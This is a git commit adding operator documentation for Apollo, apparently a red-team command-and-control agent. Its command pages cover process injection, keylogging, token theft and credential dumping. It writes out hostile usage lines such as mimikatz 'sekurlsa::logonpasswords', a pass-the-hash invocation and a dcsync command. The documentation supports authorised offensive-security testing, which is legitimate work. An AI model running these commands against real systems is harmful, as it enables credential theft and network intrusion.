first commit

documentation-payload/apollo/commands/_index.md

@@ -0,0 +1,84 @@
++++
+title = "Commands"
+chapter = true
+weight = 15
+pre = "<b>2. </b>"
++++
+
+![logo](/agents/apollo/ApolloLandscape.svg?width=600px)
+
+## Table of Contents
+
+- Lateral Movement
+    * [link](/agents/apollo/commands/link/)
+    * [unlink](/agents/apollo/commands/unlink/)
+- Credential/Token Commands
+    * [whoami](/agents/apollo/commands/whoami/)
+    * [rev2self](/agents/apollo/commands/rev2self/)
+    * [getprivs](/agents/apollo/commands/getprivs/)
+    * [make_token](/agents/apollo/commands/make_token/)
+    * [steal_token](/agents/apollo/commands/steal_token/)
+    * [mimikatz](/agents/apollo/commands/mimikatz/)
+    * [pth](/agents/apollo/commands/pth/)
+    * [dcsync](/agents/apollo/commands/dcsync/)
+- User Exploitation
+    * [keylog_inject](/agents/apollo/commands/keylog_inject/)
+    * [screenshot_inject](/agents/apollo/commands/screenshot_inject/)
+    * [screenshot](/agents/apollo/commands/screenshot/)
+- .NET Assembly Commands
+    * [inline_assembly](/agents/apollo/commands/inline_assembly/)
+    * [execute_assembly](/agents/apollo/commands/execute_assembly/)
+    * [assembly_inject](/agents/apollo/commands/assembly_inject/)
+    * [register_assembly](/agents/apollo/commands/register_assembly/)
+- PowerShell Commands
+    * [powershell](/agents/apollo/commands/powershell/)
+    * [psinject](/agents/apollo/commands/psinject/)
+    * [powerpick](/agents/apollo/commands/powerpick/)
+    * [powershell_import](/agents/apollo/commands/powershell_import/)
+- File Operations
+    * [upload](/agents/apollo/commands/upload/)
+    * [download](/agents/apollo/commands/download/)
+    * [rm](/agents/apollo/commands/rm/)
+    * [mkdir](/agents/apollo/commands/mkdir/)
+    * [cp](/agents/apollo/commands/cp/)
+    * [cat](/agents/apollo/commands/cat/)
+    * [mv](/agents/apollo/commands/mv/)
+    * [ls](/agents/apollo/commands/ls/)
+    * [pwd](/agents/apollo/commands/pwd/)
+    * [cd](/agents/apollo/commands/cd/)
+- Job Management
+    * [jobs](/agents/apollo/commands/jobs/)
+    * [jobkill](/agents/apollo/commands/jobkill/)
+- Net Enumeration
+    * [net_dclist](/agents/apollo/commands/net_dclist/)
+    * [net_localgroup_member](/agents/apollo/commands/net_localgroup_member/)
+    * [net_localgroup](/agents/apollo/commands/net_localgroup/)
+    * [net_shares](/agents/apollo/commands/net_shares/)
+- Process Management
+    * [shell](/agents/apollo/commands/shell/)
+    * [run](/agents/apollo/commands/run/)
+    * [kill](/agents/apollo/commands/kill/)
+    * [ps](/agents/apollo/commands/ps/)
+- Registry Management
+    * [reg_query](/agents/apollo/commands/reg_query/)
+    * [reg_write_value](/agents/apollo/commands/reg_write_value/)
+- Evasion Management
+    * [blockdlls](/agents/apollo/commands/blockdlls)
+    * [ppid](/agents/apollo/commands/ppid)
+    * [spawnto_x64](/agents/apollo/commands/spawnto_x64/)
+    * [spawnto_x86](/agents/apollo/commands/spawnto_x86/)
+    * [get_injection_techniques](/agents/apollo/commands/get_injection_techniques/)
+    * [set_injection_technique](/agents/apollo/commands/set_injection_technique/)
+- Session Management
+    * [spawn](/agents/apollo/commands/spawn/)
+    * [inject](/agents/apollo/commands/inject/)
+    * [exit](/agents/apollo/commands/exit/)
+    * [sleep](/agents/apollo/commands/sleep/)
+- Host Enumeration
+    * [ifconfig](/agents/apollo/commands/ifconfig)
+    * [netstat](/agents/apollo/commands/netstat)
+- Miscellaneous
+    * [printspoofer](/agents/apollo/commands/printspoofer/)
+    * [shinject](/agents/apollo/commands/shinject/)
+    * [socks](/agents/apollo/commands/socks/)
+    * [execute_pe](/agents/apollo/commands/execute_pe/)

documentation-payload/apollo/commands/assembly_inject.md

@@ -0,0 +1,40 @@
++++
+title = "assembly_inject"
+chapter = false
+weight = 103
+hidden = false
++++
+
+{{% notice info %}}
+Artifacts Generated: Process Inject
+{{% /notice %}}
+
+## Summary
+
+Inject the .NET assembly loader into a remote process and execute an assembly registered with `register_file`. This assembly is injected into the remote process using the injection technique currently specified by `get_injection_techniques`.
+
+### Arguments (Positional or Popup)
+
+![args](../images/assembly_inject.png)
+
+#### Arguments
+Any arguments to be executed with the assembly.
+
+#### Assembly
+Name used when registering assembly with the `register_file` command (e.g., `Seatbelt.exe`)
+
+#### PID
+Process ID to inject into.
+
+## Usage
+```
+assembly_inject -PID 7344 -Assembly Seatbelt.exe -Arguments DotNet
+```
+
+Example
+
+![ex](../images/assembly_inject_resp.png)
+
+## MITRE ATT&CK Mapping
+
+- T1055

documentation-payload/apollo/commands/blockdlls.md

@@ -0,0 +1,15 @@
++++
+title = "blockdlls"
+chapter = false
+weight = 103
+hidden = false
++++
+
+## Summary
+Prevent non-Microsoft signed DLLs from loading into post-exploitation jobs.
+
+## Usage
+```
+blockdlls
+blockdlls -EnableBlock [true|false]
+```

documentation-payload/apollo/commands/cat.md

@@ -0,0 +1,34 @@
++++
+title = "cat"
+chapter = false
+weight = 103
+hidden = false
++++
+
+{{% notice info %}}
+Artifacts Generated: File Open
+{{% /notice %}}
+
+## Summary
+
+Read the contents of a file 256kb at a time.
+
+### Arguments
+![args](../images/cat.png)
+#### Path
+Specify path to file to read contents
+
+## Usage
+```
+cat -Path [path]
+```
+Example
+```
+cat -Path C:\config.txt
+cat C:\config.txt
+```
+
+## MITRE ATT&CK Mapping
+
+- T1081
+- T1106

documentation-payload/apollo/commands/cd.md

@@ -0,0 +1,42 @@
++++
+title = "cd"
+chapter = false
+weight = 103
+hidden = false
++++
+
+## Summary
+Change the process's current working directory to a specified directory. This command accepts relative paths such as `..\` as well.
+
+## Arguments
+
+![args](../images/cd.png)
+
+### Path
+Change to the directory specified by path.
+
+## Usage
+```
+cd -Path [path]
+cd [path]
+```
+Example
+```
+cd -Path C:\Users
+```
+Change to the root directory.
+```
+cd C:\
+```
+Change to the previous level directory.
+```
+cd ..
+```
+Change to a directory with spaces in name.
+```
+cd C:\Program Files
+```
+
+## MITRE ATT&CK Mapping
+
+- T1083

documentation-payload/apollo/commands/cp.md

@@ -0,0 +1,38 @@
++++
+title = "cp"
+chapter = false
+weight = 103
+hidden = false
++++
+
+{{% notice info %}}
+### Artifacts
+- File Open
+- File Write
+{{% /notice %}}
+
+## Summary
+Copy a specified file to another location.
+
+### Arguments
+
+![args](../images/cp.png)
+
+#### Path
+The path to the original file that will be copied and placed in the location specified by `Destination`.
+
+#### Destination
+The path to copy a file too.
+
+## Usage
+```
+cp -Path [source] -Destination [destination]
+```
+Example
+```
+cp -Path test1.txt -Destination "C:\Program Files\test2.txt"
+```
+
+## MITRE ATT&CK Mapping
+
+- T1570

documentation-payload/apollo/commands/dcsync.md

@@ -0,0 +1,42 @@
++++
+title = "dcsync"
+chapter = false
+weight = 103
+hidden = false
++++
+
+{{% notice info %}}
+Artifacts Generated: Process Create, Process Inject, Process Kill
+{{% /notice %}}
+
+## Summary
+Use mimikatz's `lsadump::dcsync` module to retrieve a user's kerberos keys from a Domain Controller.
+
+### Arguments
+#### Domain
+Domain to query information from.
+
+#### User (Optional)
+Username to sync kerberos keys for. Default is all users.
+
+#### DC (Optional)
+Domain controller to sync credential material from.
+
+## Usage
+```
+dcsync -Domain domain.local [-User username -DC dc.domain.local]
+```
+
+Example
+```
+dcsync -Domain contoso.local -User djhohnstein -DC 10.120.30.204
+dcsync -Domain contoso.local
+```
+
+
+## MITRE ATT&CK Mapping
+
+- T1003.006
+
+### Resrouces
+- [mimikatz](https://github.com/gentilkiwi/mimikatz)

documentation-payload/apollo/commands/download.md

@@ -0,0 +1,46 @@
++++
+title = "download"
+chapter = false
+weight = 103
+hidden = false
++++
+
+{{% notice info %}}
+Artifacts Generated: File Open
+{{% /notice %}}
+
+## Summary
+Download a specified file from the agent's host to the Mythic server.
+
+### Arguments (Positional)
+#### Path
+
+Path to the file to download.
+
+#### Host (optional)
+
+Host to download the file from. Default: localhost.
+
+## Usage
+```
+download -Path [path to file] [-Host [127.0.0.1]]
+```
+Example
+```
+download -Path C:\Users\user\Downloads\test.txt
+
+download -Path C:\Users\user\Downloads\test.txt -Host 127.0.0.1
+
+From the file browser, Actions -> Task a Download
+```
+
+When the download completes, clicking the link will automatically download the file to your Downloads folder.
+
+![download2](../images/download02.png)
+
+
+## MITRE ATT&CK Mapping
+
+- T1020
+- T1030
+- T1041

documentation-payload/apollo/commands/execute_assembly.md

@@ -0,0 +1,48 @@
++++
+title = "execute_assembly"
+chapter = false
+weight = 103
+hidden = false
++++
+
+{{% notice info %}}
+Artifacts Generated: Process Create, Process Inject, Process Kill
+{{% /notice %}}
+
+## Summary
+
+Execute a .NET Framework assembly with the specified arguments. This assembly must first be cached in the agent using the `register_assembly` command before being executed.
+
+### Arguments
+
+![exeasm](../images/execute_assembly.png)
+
+#### Assembly
+The name of the assembly to execute. This must match the file name used with `register_file`. 
+
+#### Arguments (optional)
+Arguments to pass to the assembly.
+
+## Usage
+```
+execute_assembly -Assembly [assembly_name] -Arguments [arguments]
+execute_assembly [assembly_name] [arguments]
+```
+
+Example
+```
+execute_assembly SeatBelt.exe --groups=all
+```
+
+
+## MITRE ATT&CK Mapping
+
+- T1547
+
+## Detailed Summary
+The `execute_assembly` command uses a .NET Common Language Runtime loader to execute assemblies within a sacrificial process and return output over a named pipe back to the agent. This loader is injected into a sacrificial process (specified by the `spawnto_*` commands) and passes the assembly's bytes over a named pipe, which is then loaded reflectively using `System.Reflection.Assembly.Load`. This assembly is then invoked and passed any passed arguments while streaming data over the named pipe.
+
+This creates a new artifact relating to the sacrificial process spawned, which can be viewed in the artifacts page.
+
+### Resources
+- [DotNetReflectiveLoading](https://github.com/ambray/DotNetReflectiveLoading)

documentation-payload/apollo/commands/execute_coff.md

@@ -0,0 +1,53 @@
++++
+title = "execute_coff"
+chapter = false
+weight = 103
+hidden = false
++++
+
+## Summary
+
+Execute a Beacon Object File (BOF) with the specified arguments. This object file must first be cached in the agent using the `register_coff` command before being executed.
+The `RunOF.dll` ia now automatically obtained from mythic if Apollo does not have it loaded in its file store already. 
+
+### Arguments
+
+![execoff](../images/execute_coff.png)
+
+#### Object File
+The name of the object file to execute. This must match the file name used with `register_file` or `register_coff`.
+
+#### Function
+Function of the object file to call, usually 'go'.
+
+#### TimeOut
+Maximum time (in seconds) that the object file should run.
+
+#### Arguments (optional)
+Arguments to pass to the function, using the following format:
+
+-s:123 or int16:123
+-i:123 or int32:123
+-z:hello or string:hello
+-Z:hello or wchar:hello
+-b:abc== or base64:abc==
+
+## Usage
+```
+execute_coff -Coff [coff_name] -Function [go] -Timeout [30] [-Arguments [arguments]]
+```
+
+Example
+```
+execute_coff -Coff dir.x64.o -Function go -Timeout 30 -Arguments wchar:C:\\
+```
+
+## MITRE ATT&CK Mapping
+
+- T1027
+
+## Detailed Summary
+The `execute_coff` command uses a Object File loader to execute object files within a new thread and returning output back to the agent using the implementation of Beacon functions.
+
+### Resources
+- [RunOF](https://github.com/nettitude/RunOF)

documentation-payload/apollo/commands/execute_pe.md

@@ -0,0 +1,49 @@
++++
+title = "execute_pe"
+chapter = false
+weight = 103
+hidden = false
++++
+
+{{% notice info %}}
+Artifacts Generated: Process Create, Process Inject, Process Kill
+{{% /notice %}}
+
+## Summary
+
+Execute a statically compiled PE file (e.g., compiled with /MT) with the specified arguments. This PE must first be cached in the agent using the `register_file` command before being executed.
+
+{{% notice info %}}
+Executables must be compiled for the architecture of the machine. e.g., if Apollo is running on a 64-bit machine, compile the executable for x64.
+{{% /notice %}}
+
+This is based on the work put forward by Nettitude's [RunPE](https://github.com/nettitude/RunPE) project with modifications.
+
+### Arguments
+![exepe](../images/execute_pe.png)
+
+#### PE
+The name of the assembly to execute. This must match the file name used with `register_file`. 
+
+#### Arguments (optional)
+Arguments to pass to the assembly.
+
+## Usage
+```
+execute_pe -PE [pe_name] -Arguments [arguments]
+execute_pe [pe_name] [arguments]
+```
+
+Example
+```
+execute_pe -PE SpoolSample.exe -Arguments "127.0.0.1 127.0.0.1"
+execute_pe SpoolSample.exe 127.0.0.1 127.0.0.1
+```
+
+
+## MITRE ATT&CK Mapping
+
+- T1547
+
+### Resources
+- [RunPE](https://github.com/nettitude/RunPE)

documentation-payload/apollo/commands/exit.md

@@ -0,0 +1,17 @@
++++
+title = "exit"
+chapter = false
+weight = 103
+hidden = false
++++
+
+## Summary
+Task an agent to exit.
+
+## Usage
+```
+exit
+```
+
+## Detailed Summary
+The `exit` command uses the `Environment.Exit` method to exit the agent's running process. 

documentation-payload/apollo/commands/get_injection_techniques.md

@@ -0,0 +1,33 @@
++++
+title = "get_injection_techniques"
+chapter = false
+weight = 103
+hidden = false
++++
+
+## Summary
+Retrieve a list of available injection techniques the agent can use.
+
+## Usage
+```
+get_injection_techniques
+```
+
+## Detailed Summary
+The `get_injection_techniques` command displays the various process injection techniques the agent is capable of using for post-exploitation jobs. You can see the current technique being used by an agent with the [`get_injection_techniques`](/agents/apollo/commands/get_injection_techniques/) command. The technique can also be changed using the [`set_injection_technique`](/agents/apollo/commands/set_injection_technique/) command.
+
+You are encouraged to create your own injection technique and submit a new pull request!
+
+### Available techniques
+
+#### CreateRemoteThread
+"Classic" process injection technique that uses the `VirtualAllocEx`, `WriteProcessMemory` and `CreateRemoteThread` Windows APIs to execute shellcode in a specified process.
+
+#### Early-Bird QueueUserAPC
+Works for all jobs spawning sacrificial processes, but mileage may vary for injection-type commands. Calls `VirtualAllocEx`, `WriteProcessMemory`, `QueueUserAPC` and `ResumeThread` calls.
+
+#### NtCreateThreadEx
+Leverages syscalls from the NTDLL library to directly invoke shellcode associated with `NtOpenProcess`, `NtClose`, `NtDuplicateObject`, `NtAllocateVirtualMemory`, `NtProtectVirtualMemory`, `NtWriteVirtualMemory`, and `NtCreateThreadEx`
+
+
+![get_injection_techniques](../images/get_injection_techniques.png)

documentation-payload/apollo/commands/getprivs.md

@@ -0,0 +1,21 @@
++++
+title = "getprivs"
+chapter = false
+weight = 103
+hidden = false
++++
+
+## Summary
+Enable as many privileges as possible for your current access token.
+
+## Usage
+```
+getprivs
+```
+
+## MITRE ATT&CK Mapping
+
+- T1078
+
+## Detailed Summary
+The `getprivs` command uses the `AdjustTokenPrivileges` Windows API to enable all privileges assigned to the current thread's token.

documentation-payload/apollo/commands/ifconfig.md

@@ -0,0 +1,19 @@
++++
+title = "ifconfig"
+chapter = false
+weight = 103
+hidden = false
++++
+
+## Summary
+Retrieve network interface information.
+
+## Usage
+```
+ifconfig
+```
+
+
+## MITRE ATT&CK Mapping
+
+- T1590.005

documentation-payload/apollo/commands/inject.md

@@ -0,0 +1,32 @@
++++
+title = "inject"
+chapter = false
+weight = 103
+hidden = false
++++
+
+{{% notice info %}}
+Artifacts Generated: Process Inject
+{{% /notice %}}
+
+## Summary
+Inject agent shellcode into a specified process.
+
+### Arguments (Popup)
+
+![args](../images/inject.png)
+
+#### PID
+The target process's ID to inject the agent into.
+
+#### Payload Template
+The template to generate new shellcode from. Note: The template _must_ be shellcode for inject to succeed. This is the "Raw" output type when building Apollo.
+
+## Usage
+```
+inject
+```
+
+## MITRE ATT&CK Mapping
+
+- T1055

documentation-payload/apollo/commands/inline_assembly.md

@@ -0,0 +1,50 @@
++++
+title = "inline_assembly"
+chapter = false
+weight = 103
+hidden = false
++++
+
+## Summary
+
+Execute a .NET Framework assembly in-process with the specified arguments. This assembly must first be cached in the agent using the `register_assembly` command before being executed.
+
+{{% notice warning %}}
+This command does not patch Environment.Exit, and as a result, should the assembly call this function, the agent itself will exit.
+{{% /notice %}}
+
+### Arguments
+
+![exeasm](../images/inline_assembly.png)
+
+#### Assembly
+The name of the assembly to execute. This must match the file name used with `register_file`. 
+
+#### Arguments (optional)
+Arguments to pass to the assembly.
+
+## Usage
+```
+inline_assembly -Assembly [assembly_name] -Arguments [arguments]
+inline_assembly [assembly_name] [arguments]
+```
+
+Example
+```
+inline_assembly SeatBelt.exe --groups=all
+```
+
+
+## MITRE ATT&CK Mapping
+
+- T1547
+
+
+## Special Thanks
+Mayllart submitted the initial PR for this module. You can find him on his socials here:
+
+Social | Handle
+-------|-------
+Github|https://github.com/thiagomayllart
+Twitter|[@thiagomayllart](https://twitter.com/thiagomayllart)
+BloodHoundGang Slack|@Mayllart

documentation-payload/apollo/commands/jobkill.md

@@ -0,0 +1,16 @@
++++
+title = "jobkill"
+chapter = false
+weight = 103
+hidden = false
++++
+
+## Summary
+Kill a running job for an agent.
+
+## Usage (Positional)
+```
+jobkill [task_id_guid]
+```
+
+![jobs](../images/jobs.png)

documentation-payload/apollo/commands/jobs.md

@@ -0,0 +1,19 @@
++++
+title = "jobs"
+chapter = false
+weight = 103
+hidden = false
++++
+
+## Summary
+Retrieve a list of the agent's current running jobs. This list will not include `jobs` or `jobkill` related jobs.
+
+## Usage
+```
+jobs
+```
+
+## Detailed Summary
+The `jobs` command will retrieve a list of active running jobs, their parameters, and their associated process identifiers if the job required a sacrificial process.
+
+![jobs](../images/jobs.png)

documentation-payload/apollo/commands/keylog_inject.md

@@ -0,0 +1,42 @@
++++
+title = "keylog"
+chapter = false
+weight = 103
+hidden = false
++++
+
+{{% notice info %}}
+Artifacts Generated: Process Inject
+{{% /notice %}}
+
+## Summary
+Start a keylogger in a specified process.
+
+### Arguments (Positional)
+#### PID
+The target process's ID to inject the keylogging stub.
+
+## Usage
+```
+keylog_inject -PID [pid]
+```
+Example
+```
+keylog -PID 1234
+```
+
+
+## MITRE ATT&CK Mapping
+
+- T1056
+
+## Artifacts
+
+- Process Inject
+
+## Detailed Summary
+The `keylog` command uses the `GetAsyncKeyState` Windows API to log keystrokes and send them back to Mythic. This is done with a stand alone .NET assembly that is loaded with the CLR loader stub used for `execute_assembly`. The CLR loader is injected into the specified process and executes the keylogger assembly, which in turn will begin logging keystrokes and sending them over a named pipe to the agent.
+
+Keystrokes can be found in the `Operational Views > Kelogs` page. These keystrokes are sorted by host, then user, then window title. When new keystrokes are retrieved, a balloon notification will appear in the top right notifying you of the new keystrokes.
+
+![keylogs](../images/keylog01.png)

documentation-payload/apollo/commands/kill.md

@@ -0,0 +1,27 @@
++++
+title = "kill"
+chapter = false
+weight = 103
+hidden = false
++++
+
+{{% notice info %}}
+Artifacts Generated: Process Kill
+{{% /notice %}}
+
+## Summary
+Kill a process by process ID.
+
+## Usage (Positional)
+```
+kill [pid]
+```
+Example
+```
+kill 1234
+```
+
+
+## MITRE ATT&CK Mapping
+
+- T1106

documentation-payload/apollo/commands/link.md

@@ -0,0 +1,47 @@
++++
+title = "link"
+chapter = false
+weight = 103
+hidden = false
++++
+
+{{% notice info %}}
+Artifacts Generated: Network Connection
+{{% /notice %}}
+
+## Summary
+Link or re-link an agent to callback.
+
+### Arguments (Popup)
+#### Host
+Select the host running an agent to connect too.
+
+#### Payload
+Select the payload template that is associated with the running payload on the remote host. This determines what P2P profile to connect to.
+
+## Usage
+```
+link
+```
+In pop up menu
+```
+Host: [drop down list of hosts]
+Payload: [drop down list of payloads] 
+```
+
+Exmaple
+```
+link
+```
+In pop up menu
+```
+Host: client01.shire.local
+Payload: Apollo_SMB.exe
+```
+
+
+## MITRE ATT&CK Mapping
+
+- T1570
+- T1572
+- T1021

documentation-payload/apollo/commands/listpipes.md

@@ -0,0 +1,78 @@
++++
+title = "listpipes"
+chapter = false
+weight = 150
+hidden = false
++++
+
+## Summary
+The `listpipes` function enumerates all named pipes on the local Windows host using the `FindFirstFileW` API on the `\\.\\pipe\\*` namespace. Named pipes are commonly used for inter-process communication (IPC), and this function helps discover active communication endpoints used by system services, applications, or malicious software.
+
+- **Needs Admin:** False
+- **Version:** 1
+- **Author:** @ToweringDragoon
+
+### Arguments
+This command takes no arguments.
+
+## Usage
+### Example: Listing Named Pipes on the Local Machine
+**Command:**
+```c
+listpipes
+```
+
+**Output:**
+```plaintext
+Found 56 named pipes:
+InitShutdown
+lsass
+ntsvcs
+scerpc
+spoolss
+wkssvc
+srvsvc
+...
+```
+
+## MITRE ATT&CK Mapping
+- **T1083** - File and Directory Discovery (As named pipes are part of the Windows object namespace)
+
+## Detailed Summary
+The `listpipes` task queries the Windows named pipe namespace using the `FindFirstFileW("\\\\.\\pipe\\*")` API. This method allows the agent to list active named pipe objects from user mode without relying on NT Native API calls like `NtQueryDirectoryObject`, which often fail or require elevated access.
+
+### Functional Steps:
+
+1. **Initialize Pipe Search:**
+   - Calls `FindFirstFileW("\\.\\pipe\\*")` to begin enumeration of named pipe objects.
+
+2. **Iterate Through Pipe Names:**
+   - Uses `FindNextFileW` in a loop to collect all entries under the `\\.\\pipe\\` namespace.
+
+3. **Filter Results:**
+   - Trims null terminators.
+   - Filters out invalid or malformed names (though the default implementation includes everything unless manually filtered).
+
+4. **Return Results:**
+   - Aggregates all valid pipe names and returns a summary string in the format: `Found X named pipes:` followed by newline-separated pipe names.
+
+5. **Error Handling:**
+   - If `FindFirstFileW` fails, the function throws an exception with the associated Win32 error code.
+
+## APIs Used and Their Purposes
+| API | Purpose | DLL | Documentation |
+|------|---------|-----|--------------|
+| `FindFirstFileW` | Begins enumeration of pipe names under `\\.\\pipe\\` | kernel32.dll | [FindFirstFileW](https://learn.microsoft.com/en-us/windows/win32/api/fileapi/nf-fileapi-findfirstfilew) |
+| `FindNextFileW` | Continues enumeration of named pipes | kernel32.dll | [FindNextFileW](https://learn.microsoft.com/en-us/windows/win32/api/fileapi/nf-fileapi-findnextfilew) |
+| `FindClose` | Closes the pipe enumeration handle | kernel32.dll | [FindClose](https://learn.microsoft.com/en-us/windows/win32/api/fileapi/nf-fileapi-findclose) |
+| `Marshal.GetLastWin32Error` | Captures last error code after Win32 API failure | mscorlib.dll | [GetLastWin32Error](https://learn.microsoft.com/en-us/dotnet/api/system.runtime.interopservices.marshal.getlastwin32error) |
+
+## Considerations
+- **Permissions:** This command does not require administrative privileges. However, access to specific pipes may still be restricted based on ACLs.
+- **OPSEC:** Enumerating named pipes may cause suspicious handle access logs to appear in security monitoring tools or EDRs.
+- **Performance:** This is a lightweight operation and generally completes quickly unless the system has an extremely large number of named pipes.
+
+## References
+- [Windows Named Pipes](https://learn.microsoft.com/en-us/windows/win32/ipc/named-pipes)
+- [NT Object Namespace](https://learn.microsoft.com/en-us/windows/win32/sysinfo/object-namespaces)
+- [Sysinternals PipeList Tool](https://learn.microsoft.com/en-us/sysinternals/downloads/pipelist)

documentation-payload/apollo/commands/load.md

@@ -0,0 +1,21 @@
++++
+title = "load"
+chapter = false
+weight = 103
+hidden = false
++++
+
+## Summary
+Load commands that weren't included in Apollo during build time into a specific callback. This doesn't affect any other callbacks.
+
+### Arguments
+
+#### Commands
+Specify the names of the commands you want to load.
+
+## Usage
+```
+load -Commands listpipes -Commands link
+```
+
+## MITRE ATT&CK Mapping

documentation-payload/apollo/commands/ls.md

@@ -0,0 +1,35 @@
++++
+title = "ls"
+chapter = false
+weight = 103
+hidden = false
++++
+
+## Summary
+List files and folders in a specified directory. This will also populate Mythic's file browser cache.
+
+### Arguments (Positional)
+#### path
+Specify what path you want to list the contents of. If not specified, this will default to the current working directory. This parameter also accepts UNC paths, such as `\\DC01\C$`
+
+## Usage
+```
+ls [path]
+```
+
+## Example
+![ls from command line](../images/ls01.png)
+
+When clicking on the three-users icon under the "Permissions" tab, you'll see the associated ACLs for that file.
+
+![ACLs for an object](../images/ls02.png)
+
+This command is also integrated into the Mythic file browser.
+
+![File browser](../images/filebrowser.png)
+
+
+## MITRE ATT&CK Mapping
+
+- T1106
+- T1083

documentation-payload/apollo/commands/make_token.md

@@ -0,0 +1,28 @@
++++
+title = "make_token"
+chapter = false
+weight = 103
+hidden = false
++++
+
+{{% notice info %}}
+Artifacts Generated: Plaintext Credential Logon
+{{% /notice %}}
+
+## Summary
+Create a new logon session for the current thread with supplied credentials.
+
+### Arguments (Popup)
+#### Credential
+To use credentials, they must be inputted into Mythic's credential store. The credential store is populated either manually or from Mimikatz.
+
+## Usage
+```
+make_token
+```
+Select credentials from drop down list.
+
+
+## MITRE ATT&CK Mapping
+
+- T1134

documentation-payload/apollo/commands/mimikatz.md

@@ -0,0 +1,53 @@
++++
+title = "mimikatz"
+chapter = false
+weight = 103
+hidden = false
++++
+
+{{% notice info %}}
+Artifacts Generated: Process Create, Process Inject, Process Kill
+{{% /notice %}}
+
+## Summary
+Execute one or more mimikatz commands.
+
+### Arguments (Positional)
+#### Command
+The command you would like mimikatz to run. Some commands require certain privileges and may need the `token::elevate` Mimikatz command or the builtin equivalent [`getprivs`](/agents/apollo/commands/getprivs/) to be executed first.
+
+The `mimikatz` binary takes space-separated commands. For example, if you wanted to ensure your token had the correct privileges before dumping LSASS, you could do `mimikatz token::elevate sekurlsa::logonpasswords` to first elevate your token before running `logonpasswords`. Due to this space-separated command list, if you wish to run a command that has arguments (or spaces in its command name), you'll need to encapsulate that command in _escaped_ quotes. 
+
+## Usage
+```
+mimikatz -Command [command]
+```
+
+Example
+```
+mimikatz sekurlsa::logonpasswords
+mimikatz -Command sekurlsa::logonpasswords
+
+# Running one or more commands with spaces in the command name
+
+mimikatz -Command \"privilege::debug\" \"sekurlsa::pth /domain:DOMAIN /user:USERNAME /ntlm:HASH\" exit
+```
+
+## See Also
+- [dcsync](/agents/apollo/commands/dcsync/)
+- [pth](/agents/apollo/commands/dcsync/)
+
+## MITRE ATT&CK Mapping
+
+- T1134
+- T1098
+- T1547
+- T1555
+- T1003
+- T1207
+- T1558
+- T1552
+- T1550
+
+### Resrouces
+- [mimikatz](https://github.com/gentilkiwi/mimikatz)

documentation-payload/apollo/commands/mkdir.md

@@ -0,0 +1,31 @@
++++
+title = "mkdir"
+chapter = false
+weight = 103
+hidden = false
++++
+
+{{% notice info %}}
+Artifacts Generated: File Create
+{{% /notice %}}
+
+## Summary
+Make a directory at the specified path.
+
+### Arguments (Positional)
+#### path
+Path to the directory to create.
+
+## Usage
+```
+mkdir -Path [path]
+```
+Example
+```
+mkdir C:\config
+mkdir -Path C:\Users\Public\secret
+```
+
+## MITRE ATT&CK Mapping
+
+- T1106

documentation-payload/apollo/commands/mv.md

@@ -0,0 +1,43 @@
++++
+title = "mv"
+chapter = false
+weight = 103
+hidden = false
++++
+
+{{% notice info %}}
+Artifacts Generated: File Open, File Write, File Delete
+{{% /notice %}}
+
+## Summary
+Move a specified file to another location.
+
+### Arguments (Positional or Popup)
+#### Path
+The path of the original file to be moved.
+
+#### Destination
+The path to move the file to.
+
+## Usage
+```
+mv
+```
+In the pop up menu
+```
+destination: [path to file]
+source: [path to file]
+```
+Example
+```
+mv
+```
+In the pop up menu
+```
+destination: C:\config.txt
+source: C:\Windows\Temp\config.txt
+```
+
+## MITRE ATT&CK Mapping
+
+- T1106

documentation-payload/apollo/commands/net_dclist.md

@@ -0,0 +1,28 @@
++++
+title = "net_dclist"
+chapter = false
+weight = 103
+hidden = false
++++
+
+## Summary
+Collect information on domain controllers from the current or a specified domain
+
+### Arguments (Positional)
+#### domain (optional)
+Specify the domain to collect domain controller information from. This will default to the current domain if one is not supplied.
+
+## Usage
+```
+net_dclist [domain]
+```
+Example
+```
+net_dclist lab.local
+```
+![net_dclist](../images/net_dclist.png)
+
+
+## MITRE ATT&CK Mapping
+
+- T1590

documentation-payload/apollo/commands/net_localgroup.md

@@ -0,0 +1,32 @@
++++
+title = "net_localgroup"
+chapter = false
+weight = 103
+hidden = false
++++
+
+# net_localgroup
+
+## Summary
+Collect information on local groups for a specified computer.
+
+### Arguments (Positional)
+#### Computer (optional)
+Specify the computer to collect group information from. This will default to the localhost if one is not supplied.
+
+## Usage
+```
+net_localgroup [computer]
+```
+Example
+```
+net_localgroup client01.lab.local
+```
+
+![net_localgroup](../images/net_localgroup.png)
+
+
+## MITRE ATT&CK Mapping
+
+- T1590
+- T1069

documentation-payload/apollo/commands/net_localgroup_member.md

@@ -0,0 +1,35 @@
++++
+title = "net_localgroup_member"
+chapter = false
+weight = 103
+hidden = false
++++
+
+## Summary
+Collect membership of local groups on a specified computer.
+
+### Arguments
+
+#### Group
+
+Name of group to query for membership.
+
+#### Computer (optional)
+
+Specify the computer to collect group information from. This will default to the localhost if one is not supplied.
+
+## Usage
+```
+net_localgroup_member [computer] [group]
+```
+
+![net_localgroup_member command](../images/net_localgroup_member.png)
+
+
+## MITRE ATT&CK Mapping
+
+- T1590
+- T1069
+
+## Detailed Summary
+The `net_localgroup_member` command uses `NetLocalGroupGetMembers` Windows API to collect information about local group membership on a specified host. This information includes the member's name, group name, SID, if the member is a group and what computer it was collected from.